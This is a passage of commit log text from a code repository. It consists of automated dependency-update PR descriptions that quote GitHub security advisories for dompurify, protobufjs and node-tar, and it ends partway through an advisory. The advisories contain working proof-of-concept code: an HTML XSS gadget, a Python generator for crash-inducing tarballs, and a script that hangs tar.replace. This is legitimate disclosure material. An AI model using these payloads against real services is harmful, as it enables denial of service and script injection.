rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yNzUuMiIsInVwZGF0ZWRJblZlciI6IjQzLjI4MC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
7c6a36728c |
chore: bump up dompurify version to v3.4.12 [SECURITY] (#15326)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [dompurify](https://redirect.github.com/cure53/DOMPurify) | [`3.4.11` → `3.4.12`](https://renovatebot.com/diffs/npm/dompurify/3.4.11/3.4.12) |  |  | --- ### DOMPurify: `CUSTOM_ELEMENT_HANDLING` bypasses `afterSanitizeElements` for allowed custom elements. [GHSA-c2j3-45gr-mqc4](https://redirect.github.com/advisories/GHSA-c2j3-45gr-mqc4) <details> <summary>More information</summary> #### Details ##### Summary There is a possible hook-policy inconsistency in DOMPurify 3.4.11 involving `CUSTOM_ELEMENT_HANDLING`. When a custom element is allowed via `CUSTOM_ELEMENT_HANDLING.tagNameCheck`, it appears that the element does not go through `afterSanitizeElements` in the same way as a normal element. As a result, an application that relies on `afterSanitizeElements` as a security policy layer to strip sensitive attributes from all elements may see those attributes removed from normal elements but preserved on allowed custom elements. This does not appear to be a direct DOMPurify XSS or a case where DOMPurify directly allows executable payloads. The preserved value is still inert at sanitize time. The issue becomes relevant when the allowed custom element later re-injects that attribute value into an HTML sink such as `innerHTML`, creating a second-order XSS gadget. ##### Details The issue appears to originate from the control flow in `src/purify.ts`: line 1672~1691 ```tsx const _sanitizeDisallowedNode = function ( currentNode: any, tagName: string ): boolean { /* Check if we have a custom element to handle */ if (!FORBID_TAGS[tagName] && _isBasicCustomElement(tagName)) { if ( CUSTOM_ELEMENT_HANDLING.tagNameCheck instanceof RegExp && regExpTest(CUSTOM_ELEMENT_HANDLING.tagNameCheck, tagName) ) { return false; } if ( CUSTOM_ELEMENT_HANDLING.tagNameCheck instanceof Function && CUSTOM_ELEMENT_HANDLING.tagNameCheck(tagName) ) { return false; } } ``` `CUSTOM_ELEMENT_HANDLING` is parsed from user configuration at `src/purify.ts`: line 741~748 ```tsx const customElementHandling = objectHasOwnProperty(cfg, 'CUSTOM_ELEMENT_HANDLING') && cfg.CUSTOM_ELEMENT_HANDLING && typeof cfg.CUSTOM_ELEMENT_HANDLING === 'object' ? clone(cfg.CUSTOM_ELEMENT_HANDLING) : create(null); CUSTOM_ELEMENT_HANDLING = create(null); ``` In particular, `tagNameCheck`, `attributeNameCheck`, and `allowCustomizedBuiltInElements` are copied into the internal `CUSTOM_ELEMENT_HANDLING` object there. During element sanitization, `_sanitizeElements()` checks whether a node is forbidden or not allowlisted at `src/purify.ts`: line 1805~1814 ```tsx /* Remove element if anything forbids its presence */ if ( FORBID_TAGS[tagName] || (!( EXTRA_ELEMENT_HANDLING.tagCheck instanceof Function && EXTRA_ELEMENT_HANDLING.tagCheck(tagName) ) && !ALLOWED_TAGS[tagName]) ) { return _sanitizeDisallowedNode(currentNode, tagName); } ``` If so, it immediately delegates to `_sanitizeDisallowedNode(currentNode, tagName)` and returns its boolean result. Inside `_sanitizeDisallowedNode()`, the custom-element-specific allow path is implemented at `src/purify.ts`: line 1672~1692 ```tsx const _sanitizeDisallowedNode = function ( currentNode: any, tagName: string ): boolean { /* Check if we have a custom element to handle */ if (!FORBID_TAGS[tagName] && _isBasicCustomElement(tagName)) { if ( CUSTOM_ELEMENT_HANDLING.tagNameCheck instanceof RegExp && regExpTest(CUSTOM_ELEMENT_HANDLING.tagNameCheck, tagName) ) { return false; } if ( CUSTOM_ELEMENT_HANDLING.tagNameCheck instanceof Function && CUSTOM_ELEMENT_HANDLING.tagNameCheck(tagName) ) { return false; } } ``` If the node is treated as a basic custom element and `CUSTOM_ELEMENT_HANDLING.tagNameCheck` matches, the function returns `false` immediately at line 1682 or 1689, meaning “do not remove this node”. That early `return false` is significant because control returns directly to `_sanitizeElements()` via the `return _sanitizeDisallowedNode(...)` at line 1813. As a result, the later logic in `_sanitizeElements()` is skipped for that custom element instance, including: - the namespace validation at `src/purify.ts`: line 1816~1826 ```tsx * Check whether element has a valid namespace. Realm-safe check (GHSA-hpcv-96wg-7vj8): use the cached Node.prototype nodeType getter rather than `instanceof Element`, which is realm- bound and short-circuits to false for any node minted in a different realm — letting a foreign-realm element with a forbidden namespace slip past the namespace check entirely. */ const nt = getNodeType ? getNodeType(currentNode) : currentNode.nodeType; if (nt === NODE_TYPE.element && !_checkValidNamespace(currentNode)) { _forceRemove(currentNode); return true; } ``` - the fallback-tag mXSS check at `src/purify.ts`: line 1828~1837 ```tsx /* Make sure that older browsers don't get fallback-tag mXSS */ if ( (tagName === 'noscript' || tagName === 'noembed' || tagName === 'noframes') && regExpTest(EXPRESSIONS.FALLBACK_TAG_CLOSE, currentNode.innerHTML) ) { _forceRemove(currentNode); return true; } ``` - most importantly for this report, the `afterSanitizeElements` hook dispatch at `src/purify.ts`: line 1850~1851. ```tsx /* Execute a hook if present */ _executeHooks(hooks.afterSanitizeElements, currentNode, null); ``` In other words, a normal allowlisted element continues through `_sanitizeElements()` and reaches `hooks.afterSanitizeElements`, but a disallowed-by-default element that is revived by the `CUSTOM_ELEMENT_HANDLING.tagNameCheck` path does not. This creates a policy inconsistency: an application that relies on `afterSanitizeElements` to remove an attribute from all elements will observe that the policy is applied to normal elements but not to custom elements allowed through `CUSTOM_ELEMENT_HANDLING`. In the PoC, the application hook removes `data-bio` from ordinary elements, but the same attribute remains on `<x-bio>` because the custom-element keep path bypasses `afterSanitizeElements`. The attribute itself is inert at sanitize time and DOMPurify is not directly allowing executable SVG/HTML through. The security impact appears when the application-defined custom element later reads the preserved `data-bio` value in `connectedCallback()` and writes it to `innerHTML`, turning the preserved attribute into a second-order XSS gadget. ##### PoC Reproduced on DOMPurify 3.4.11. ##### Steps 1. Save the following HTML to a file, for example `poc.html`. 2. Open it in a browser. 3. Observe that the `div` control loses `data-bio`, while the allowed custom element keeps it. 4. Observe that after `connectedCallback()` runs, the candidate payload is reinserted into the DOM and executes through the custom element’s own sink. ##### HTML PoC ```html <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <script src="https://cdnjs.cloudflare.com/ajax/libs/dompurify/3.4.11/purify.min.js"></script> </head> <body> <pre id="result"></pre> <script> window.__controlFired = false; window.__candidateFired = false; customElements.define("x-bio", class extends HTMLElement { connectedCallback() { const bio = this.getAttribute("data-bio"); if (bio) this.innerHTML = bio; } }); DOMPurify.addHook("afterSanitizeElements", node => { if (node.hasAttribute && node.hasAttribute("data-bio")) { node.removeAttribute("data-bio"); } }); const config = { CUSTOM_ELEMENT_HANDLING: { tagNameCheck: /^x-/ } }; const controlInput = '<div data-bio="<img src=x onerror=window.__controlFired=true>"></div>'; const candidateInput = '<x-bio data-bio="<img src=x onerror=window.__candidateFired=true>"></x-bio>'; const cleanControl = DOMPurify.sanitize(controlInput, config); const cleanCandidate = DOMPurify.sanitize(candidateInput, config); const container = document.createElement("div"); container.innerHTML = cleanCandidate; document.body.appendChild(container); setTimeout(() => { document.getElementById("result").textContent = "This is not direct DOMPurify XSS.\n" + "The payload becomes executable only after x-bio writes data-bio into innerHTML.\n\n" + "control: " + cleanControl + "\n" + "candidate: " + cleanCandidate + "\n" + "after connectedCallback: " + container.innerHTML + "\n" + "control fired: " + window.__controlFired + "\n" + "candidate fired: " + window.__candidateFired; }, 100); </script> </body> </html> ``` ##### Expected result ``` control: <div></div> candidate: <x-bio data-bio="<img src=x onerror=window.__candidateFired=true>"></x-bio> after connectedCallback: <x-bio data-bio="..."><img src="x" onerror="window.__candidateFired=true"></x-bio> control fired: false candidate fired: true ``` This is output of HTML PoC. <img width="1917" height="961" alt="poc" src="https://github.com/user-attachments/assets/80e22989-5779-42f8-8ffb-106e9a4c2b10" /> ##### Impact This does not appear to affect DOMPurify’s default configuration as a direct sanitizer bypass. The impact is limited to applications that: - enable `CUSTOM_ELEMENT_HANDLING`, - rely on `afterSanitizeElements` as a security policy layer, - expect that hook to apply uniformly to all surviving elements, - and have allowed custom elements that later re-inject preserved attribute values into `innerHTML` or another HTML sink. In that situation, the behavior can become a second-order XSS gadget because a security-relevant attribute is removed from normal elements but remains on allowed custom elements. Possible fixes or mitigations might include - ensuring that allowed custom elements also consistently pass through `afterSanitizeElements` - documenting clearly that elements preserved via `CUSTOM_ELEMENT_HANDLING` may not participate in the same post-element hook flow as normal allowlisted elements. #### Severity - CVSS Score: 2.1 / 10 (Low) - Vector String: `CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N` #### References - [https://github.com/cure53/DOMPurify/security/advisories/GHSA-c2j3-45gr-mqc4](https://redirect.github.com/cure53/DOMPurify/security/advisories/GHSA-c2j3-45gr-mqc4) - [https://github.com/cure53/DOMPurify/pull/1537](https://redirect.github.com/cure53/DOMPurify/pull/1537) - [https://github.com/cure53/DOMPurify/commit/a9ca1e537422319a557a9a2aa61f003b23b4a197](https://redirect.github.com/cure53/DOMPurify/commit/a9ca1e537422319a557a9a2aa61f003b23b4a197) - [https://github.com/cure53/DOMPurify/releases/tag/3.4.12](https://redirect.github.com/cure53/DOMPurify/releases/tag/3.4.12) - [https://github.com/advisories/GHSA-c2j3-45gr-mqc4](https://redirect.github.com/advisories/GHSA-c2j3-45gr-mqc4) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-c2j3-45gr-mqc4) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>cure53/DOMPurify (dompurify)</summary> ### [`v3.4.12`](https://redirect.github.com/cure53/DOMPurify/releases/tag/3.4.12): DOMPurify 3.4.12 [Compare Source](https://redirect.github.com/cure53/DOMPurify/compare/3.4.11...3.4.12) - Fixed an issue where a hook would not get called for custom elements, thanks [@​Rikuxx0](https://redirect.github.com/Rikuxx0) - Hardened the handling of hooks removing elements, [@​mkrause-bee360](https://redirect.github.com/mkrause-bee360) - Added support for a few new SVG attributes, thanks [@​cbn-falias](https://redirect.github.com/cbn-falias) & [@​Develop-KIM](https://redirect.github.com/Develop-KIM) - Hardened the handling of declarative partial updates - Updated the documentation is several spots, README, wiki, etc. - Bumped several dependencies where possible </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yNzUuMiIsInVwZGF0ZWRJblZlciI6IjQzLjI3NS4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
927cc45c7b |
chore: bump up protobufjs version to v7.6.5 [SECURITY] (#15296)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [protobufjs](https://redirect.github.com/protobufjs/protobuf.js) | [`7.6.4` → `7.6.5`](https://renovatebot.com/diffs/npm/protobufjs/7.6.4/7.6.5) |  |  | --- ### protobufjs: Denial of Service via infinite loop in .proto option parsing [CVE-2026-59877](https://nvd.nist.gov/vuln/detail/CVE-2026-59877) / [GHSA-j3f2-48v5-ccww](https://redirect.github.com/advisories/GHSA-j3f2-48v5-ccww) <details> <summary>More information</summary> #### Details ##### Summary protobufjs parsed option names by advancing through schema tokens until it reached an `=` token, without checking for end of input. A crafted `.proto` schema that opens an option declaration but ends prematurely could cause the option parser to loop without ever terminating. This affects the reflection parsing path (`parse`, `Root.load`, `Root.loadSync`). ##### Impact An attacker who can provide or influence `.proto` schema text parsed by an application may be able to cause the parsing call to never return. Because Node.js is single-threaded, the blocked event loop prevents all other work in the process, resulting in a denial of service that persists until the process is externally terminated. Applications that only encode or decode protobuf binary data with trusted schemas are not directly affected. ##### Preconditions - The application must parse `.proto` schema text influenced by an attacker. - The schema must be parsed through APIs such as `parse`, `Root.load`, or `Root.loadSync`. - The crafted input must begin an option declaration that ends before its `=` assignment. ##### Workarounds Do not parse `.proto` schemas from untrusted sources with affected versions. If untrusted schema text must be accepted, isolate parsing in a process or worker that can be safely terminated and bound it with a timeout, so a non-returning parse call cannot deny service to the rest of the application. #### Severity - CVSS Score: 5.3 / 10 (Medium) - Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L` #### References - [https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-j3f2-48v5-ccww](https://redirect.github.com/protobufjs/protobuf.js/security/advisories/GHSA-j3f2-48v5-ccww) - [https://nvd.nist.gov/vuln/detail/CVE-2026-59877](https://nvd.nist.gov/vuln/detail/CVE-2026-59877) - [https://github.com/protobufjs/protobuf.js/pull/2352](https://redirect.github.com/protobufjs/protobuf.js/pull/2352) - [https://github.com/protobufjs/protobuf.js/commit/10fba6d54815ceecca8a06b9a6db490c8f5d2217](https://redirect.github.com/protobufjs/protobuf.js/commit/10fba6d54815ceecca8a06b9a6db490c8f5d2217) - [https://github.com/protobufjs/protobuf.js/commit/fa5c73add738ceb471e74da8cc2f3727c3d0a69f](https://redirect.github.com/protobufjs/protobuf.js/commit/fa5c73add738ceb471e74da8cc2f3727c3d0a69f) - [https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v7.6.5](https://redirect.github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v7.6.5) - [https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v8.6.6](https://redirect.github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v8.6.6) - [https://github.com/advisories/GHSA-j3f2-48v5-ccww](https://redirect.github.com/advisories/GHSA-j3f2-48v5-ccww) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-j3f2-48v5-ccww) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>protobufjs/protobuf.js (protobufjs)</summary> ### [`v7.6.5`](https://redirect.github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v7.6.5): protobufjs: v7.6.5 [Compare Source](https://redirect.github.com/protobufjs/protobuf.js/compare/protobufjs-v7.6.4...protobufjs-v7.6.5) ##### Bug Fixes - handle EOF during options parsing ([#​2352](https://redirect.github.com/protobufjs/protobuf.js/issues/2352)) ([#​2356](https://redirect.github.com/protobufjs/protobuf.js/issues/2356)) ([10fba6d](https://redirect.github.com/protobufjs/protobuf.js/commit/10fba6d54815ceecca8a06b9a6db490c8f5d2217)) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yNzIuNCIsInVwZGF0ZWRJblZlciI6IjQzLjI3Mi40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
cbc63b9f73 |
chore: bump up tar version to v7.5.19 [SECURITY] (#15297)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [tar](https://redirect.github.com/isaacs/node-tar) | [`7.5.16` → `7.5.19`](https://renovatebot.com/diffs/npm/tar/7.5.16/7.5.19) |  |  | --- ### node-tar: Uncaught Exception DoS via NUL byte in PAX path/linkpath records [CVE-2026-59875](https://nvd.nist.gov/vuln/detail/CVE-2026-59875) / [GHSA-gvwx-54wh-qm9j](https://redirect.github.com/advisories/GHSA-gvwx-54wh-qm9j) <details> <summary>More information</summary> #### Details ##### Summary `node-tar` strips trailing `NUL` bytes from long-name (`L`) and long-linkpath (`K`) GNU extended headers but does **not** apply the same sanitization to equivalent fields delivered via PAX (`x` typeflag) extended headers. A PAX record of the form `path=visible.txt\x00hidden.txt` is parsed verbatim into `entry.path` and flows into `fs.lstat()` / `fs.open()`, which Node.js core rejects with `ERR_INVALID_ARG_VALUE`. The throw originates inside an `FSReqCallback` async chain that is **not** wrapped by the consumer's `await/try-catch` around `tar.x()` — it surfaces as `uncaughtException` and terminates the process. This is a remote denial-of-service primitive against any process that extracts attacker-supplied tarballs through `tar.x` / `tar.extract` / `tar.t` / `tar.Parser`, even when the consumer follows the documented `try/catch` error-handling pattern. A secondary parser-differential (CWE-436) exists because `tar(1)`, `bsdtar`, and Python `tarfile` truncate the path at the first `NUL` (yielding `visible.txt`) while node-tar retains the full string. A validator that pre-scans a tarball with one tool and extracts with the other is bypassed. --- ##### Root cause ##### Vulnerable sink — `src/pax.ts:157-183` PAX KV records flow through `parseKVLine`. The value half (`v`) is assigned directly to the result object with no sanitization for embedded NUL bytes: ```ts // src/pax.ts:157 const parseKVLine = (set: Record<string, unknown>, line: string) => { const n = parseInt(line, 10) if (n !== Buffer.byteLength(line) + 1) return set line = line.slice((n + ' ').length) const kv = line.split('=') const r = kv.shift() if (!r) return set const k = r.replace(/^SCHILY\.(dev|ino|nlink)/, '$1') const v = kv.join('=') // <-- NO NUL STRIP set[k] = /^([A-Z]+\.)?([mac]|birth|creation)time$/.test(k) ? new Date(Number(v) * 1000) : /^[0-9]+$/.test(v) ? +v : v // <-- v with NULs lands here return set } ``` The PAX record body is length-prefixed, so the parser knows the exact byte boundary — but it never checks whether the value half between `=` and `\n` contains `NUL`. The result is consumed by `Header` / `ReadEntry`, where `entry.path` and `entry.linkpath` carry the embedded NUL all the way to `fs.lstat()`. ##### Correctly-patched cousin sink — `src/parse.ts:375-388` The equivalent code path for GNU L/K long-headers **does** strip NUL bytes: ```ts // src/parse.ts:375 case 'NextFileHasLongPath': case 'OldGnuLongPath': { const ex = this[EX] ?? Object.create(null) this[EX] = ex ex.path = this[META].replace(/\0.*/, '') // <-- NUL strip applied break } case 'NextFileHasLongLinkpath': { const ex = this[EX] || Object.create(null) this[EX] = ex ex.linkpath = this[META].replace(/\0.*/, '') // <-- NUL strip applied break } ``` The `parse.ts` fix is the maintainer's own acknowledgement that path strings on this codepath must be NUL-stripped before reaching `fs.*`. The PAX path produces the identical primitive but bypasses the guard. ##### Downstream blast radius `entry.path` and `entry.linkpath` are consumed in: - `src/unpack.ts` → `fs.lstat`, `fs.open`, `fs.symlink`, `fs.link`, `fs.mkdir` - `src/list.ts` (no crash — listing tolerates NUL in strings) - Any consumer of the `ReadEntry` event that calls `path.join()` / `fs.*` on `entry.path` The crash fires inside the FSReqCallback Node-internal async machinery, **outside** the user's `await tar.x(...)` Promise rejection boundary. --- ##### Proof of Concept ##### Artifacts - `poc-null-byte-crash.tar` — 3072 bytes — PAX `path=visible.txt\x00hidden.txt` - `poc-null-linkpath-crash.tar` — 2560 bytes — PAX `linkpath=target\x00garbage` (symlink target sink) - `poc1-pax-prefix.py` — minimal PAX-header builder (Python 3, no deps) ##### Tarball generator (minimal repro — Python 3) ```python #!/usr/bin/env python3 """Minimal PAX-NUL-injection tarball generator for node-tar PoC.""" import os def cksum(b): s = 0 for i, x in enumerate(b): s += 0x20 if 148 <= i < 156 else x return s def pad512(buf): rem = len(buf) % 512 return buf + b'\0' * (512 - rem) if rem else buf def hdr(name, size, typeflag, prefix=b'', linkpath=b''): b = bytearray(512) b[0:len(name[:100])] = name[:100] b[100:108] = b'0000644\0' b[108:116] = b'0001000\0' b[116:124] = b'0001000\0' b[124:136] = ('%011o ' % size).encode() b[136:148] = ('%011o ' % 0).encode() b[148:156] = b' ' b[156:157] = typeflag b[157:157+len(linkpath[:100])] = linkpath[:100] b[257:265] = b'ustar\x0000' b[265:270] = b'root\0' b[297:302] = b'root\0' b[329:337] = b'0000000\0' b[337:345] = b'0000000\0' b[345:345+len(prefix[:155])] = prefix[:155] s = cksum(b) b[148:156] = ('%06o\0 ' % s).encode() return bytes(b) def pax(records): body = b'' for k, v in records: kv = b' ' + k + b'=' + v + b'\n' for digits in range(1, 8): total = digits + len(kv) if len(str(total)) == digits: break body += str(total).encode() + kv return pad512(hdr(b'PaxHeader/poc', len(body), b'x') + body) out = pax([(b'path', b'visible.txt\x00hidden.txt')]) # NUL in PAX path out += hdr(b'placeholder', 1, b'0') out += pad512(b'A') out += b'\0' * 1024 # end-of-archive open('poc.tar', 'wb').write(out) ``` ##### Reproduction ```bash ##### 1. Generate tarball python3 poc1-pax-prefix.py # writes poc.tar (3 KB) ##### 2. Install vulnerable version mkdir repro && cd repro npm init -y && npm install tar@7.5.16 ##### 3. Try to extract with documented try/catch — observe uncaught exception mkdir -p ./out node --input-type=module -e ' process.on("uncaughtException", e => { console.log("UNCAUGHT:", e.code, "-", e.message); process.exit(99); }); import("tar").then(async tar => { try { await tar.x({ file: "../poc.tar", cwd: "./out" }); console.log("NORMAL_RETURN"); } catch (e) { console.log("CAUGHT_BY_USER:", e.code); } });' ``` ##### Observed output (verified 2026-06-23 against `tar@7.5.16`) ``` UNCAUGHT: ERR_INVALID_ARG_VALUE - The argument 'path' must be a string, Uint8Array, or URL without null bytes. Received '/.../out/visible.txt\x00hidden.txt' exit: 99 ``` The exception bypasses the user's `try { await tar.x(...) } catch (e) { ... }` block and lands in the global `uncaughtException` handler. In a typical server without that handler, the process exits. --- ##### Impact ##### Direct: remote DoS Any service that ingests attacker-supplied tarballs via node-tar inherits a one-tarball-kills-the-process primitive. Realistic deployments where this is reachable without user interaction: - npm registry tarball ingestion and downstream mirrors - GitHub Actions cache restore (`actions/cache`, `actions/setup-*` extracting toolchains) - Container image build pipelines that unpack layer tarballs through node tooling - Backup-restore services accepting user uploads - CI artifact processors and badge generators - Static-site / Docusaurus / Next.js build runners that fetch and extract dep tarballs - Cloud functions that auto-extract uploaded archives A correctly-coded consumer that does: ```js try { await tar.x({ file: req.upload.path, cwd: tmpdir }); } catch (e) { return res.status(400).json({ error: 'bad archive' }); } ``` does not catch this throw. The Node process dies and (depending on the supervisor) the worker may take time to respawn or never respawn if it dies during boot. ##### Secondary: parser-differential validator bypass (CWE-436) | Tool | Result for `path=visible.txt\x00hidden.txt` | |----------------------------|----------------------------------------------| | GNU tar (`tar -tvf`) | Lists `visible.txt` (truncated at NUL) | | `bsdtar -tvf` | Lists `visible.txt` (truncated at NUL) | | Python `tarfile.list()` | Lists `visible.txt\x00hidden.txt` (raw) | | node-tar `tar.t({file})` | Emits raw NUL-bearing path (no crash) | | node-tar `tar.x({file})` | **Crashes** (uncaught throw) | A pre-flight validator using GNU tar or bsdtar will see a benign filename; the subsequent node-tar extraction blows up. This is exploitable against any architecture that lists-and-validates-then-extracts. --- ##### Suggested patch Match the long-name handler in `parse.ts` — strip everything from the first NUL onward in `parseKVLine` value parsing: ```diff --- a/src/pax.ts +++ b/src/pax.ts @​@​ -173,7 +173,7 @​@​ const parseKVLine = (set: Record<string, unknown>, line: string) => { const k = r.replace(/^SCHILY\.(dev|ino|nlink)/, '$1') - const v = kv.join('=') + const v = kv.join('=').replace(/\0.*$/, '') set[k] = /^([A-Z]+\.)?([mac]|birth|creation)time$/.test(k) ? new Date(Number(v) * 1000) ``` This matches `src/parse.ts:379` and `src/parse.ts:386` and closes both `path` and `linkpath` sinks in one change. A defense-in-depth follow-up: add an explicit `assert(!v.includes('\0'))` (or fail-soft `return set`) at the top of `parseKVLine` so malformed PAX records that *aren't* path/linkpath also can't smuggle NUL into other unanticipated consumers (e.g. third-party readers of `entry.header.atime` Date objects constructed from `Number(v)` where `v` had embedded NUL). #### Severity - CVSS Score: 5.3 / 10 (Medium) - Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L` #### References - [https://github.com/isaacs/node-tar/security/advisories/GHSA-gvwx-54wh-qm9j](https://redirect.github.com/isaacs/node-tar/security/advisories/GHSA-gvwx-54wh-qm9j) - [https://nvd.nist.gov/vuln/detail/CVE-2026-59875](https://nvd.nist.gov/vuln/detail/CVE-2026-59875) - [https://github.com/isaacs/node-tar/commit/7a635c29f5edbf083557374d43984273ecfed5b3](https://redirect.github.com/isaacs/node-tar/commit/7a635c29f5edbf083557374d43984273ecfed5b3) - [https://github.com/isaacs/node-tar/releases/tag/v7.5.17](https://redirect.github.com/isaacs/node-tar/releases/tag/v7.5.17) - [https://github.com/advisories/GHSA-gvwx-54wh-qm9j](https://redirect.github.com/advisories/GHSA-gvwx-54wh-qm9j) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-gvwx-54wh-qm9j) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### node-tar: Negative tar entry size causes infinite loop in archive replace [CVE-2026-59874](https://nvd.nist.gov/vuln/detail/CVE-2026-59874) / [GHSA-8x88-c5mf-7j5w](https://redirect.github.com/advisories/GHSA-8x88-c5mf-7j5w) <details> <summary>More information</summary> #### Details ##### Summary A checksum-valid tar archive with a negative base-256 encoded entry size can make `tar.replace()` loop forever while scanning the existing archive. Applications that update attacker-controlled tar archives can have a worker process pinned indefinitely, causing denial of service. ##### Details The public `tar.replace()` API scans the existing archive before appending replacement entries. During this scan, it parses each tar header and advances the archive position by the parsed entry size rounded to a 512-byte block boundary. Tar supports base-256 encoded numeric fields. A crafted header can encode the entry size as `-512` while still carrying a valid checksum. The replace scan accepts that parsed negative size and uses it in the position-advance calculation. For a size of `-512`, the computed body skip is `-512`. The scan then adds the normal 512-byte header step, resulting in no net progress. The scanner repeatedly parses the same header forever and never reaches the append step. This is reachable through the supported package API when the existing archive file is attacker controlled. It does not rely on extraction, dependency behavior, or an uncaught exception. ##### PoC Save as `poc.mjs` in a project with the vulnerable package installed and run: ```bash node poc.mjs ``` ```js import fs from 'node:fs' import os from 'node:os' import path from 'node:path' import { spawnSync } from 'node:child_process' const oct = (b, n, off, len) => b.write(n.toString(8).padStart(len - 1, '0') + '\0', off, len, 'ascii') const badHeader = () => { const h = Buffer.alloc(512) h.write('x', 0) oct(h, 0o644, 100, 8) oct(h, 0, 108, 8) oct(h, 0, 116, 8) // base-256 encoded -512 in the size field Buffer.alloc(10, 0xff).copy(h, 124) h[134] = 0xfe h[135] = 0x00 oct(h, 0, 136, 12) h.fill(0x20, 148, 156) h[156] = 0x30 h.write('ustar\0' + '00', 257, 8, 'binary') let sum = 0 for (const c of h) sum += c h.write(sum.toString(8).padStart(6, '0') + '\0 ', 148, 8, 'ascii') return h } const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'tar-loop-')) const file = path.join(dir, 'poc.tar') fs.writeFileSync(file, badHeader()) fs.writeFileSync(path.join(dir, 'add.txt'), 'x') const r = spawnSync( process.execPath, [ '--input-type=module', '-e', ` import * as tar from 'tar' tar.replace({ file: ${JSON.stringify(file)}, cwd: ${JSON.stringify(dir)}, sync: true }, ['add.txt']) console.log('completed') `, ], { timeout: 20_000 } ) console.log(r.error?.code === 'ETIMEDOUT') // Output: true ``` ##### Impact An application that calls `tar.replace()` on an existing archive supplied or controlled by an attacker can be forced into a non-terminating archive scan. This can consume a worker process indefinitely and cause denial of service. Plain extraction-only workflows are not affected by this finding. #### Severity - CVSS Score: 8.7 / 10 (High) - Vector String: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N` #### References - [https://github.com/isaacs/node-tar/security/advisories/GHSA-8x88-c5mf-7j5w](https://redirect.github.com/isaacs/node-tar/security/advisories/GHSA-8x88-c5mf-7j5w) - [https://nvd.nist.gov/vuln/detail/CVE-2026-59874](https://nvd.nist.gov/vuln/detail/CVE-2026-59874) - [https://github.com/isaacs/node-tar/commit/9e78bf058b2c22dd4d52e00d8922d5c06fc2f7b5](https://redirect.github.com/isaacs/node-tar/commit/9e78bf058b2c22dd4d52e00d8922d5c06fc2f7b5) - [https://github.com/isaacs/node-tar/releases/tag/v7.5.18](https://redirect.github.com/isaacs/node-tar/releases/tag/v7.5.18) - [https://github.com/advisories/GHSA-8x88-c5mf-7j5w](https://redirect.github.com/advisories/GHSA-8x88-c5mf-7j5w) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-8x88-c5mf-7j5w) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### node-tar: Decompression/parse DoS via unlimited input [CVE-2026-59873](https://nvd.nist.gov/vuln/detail/CVE-2026-59873) / 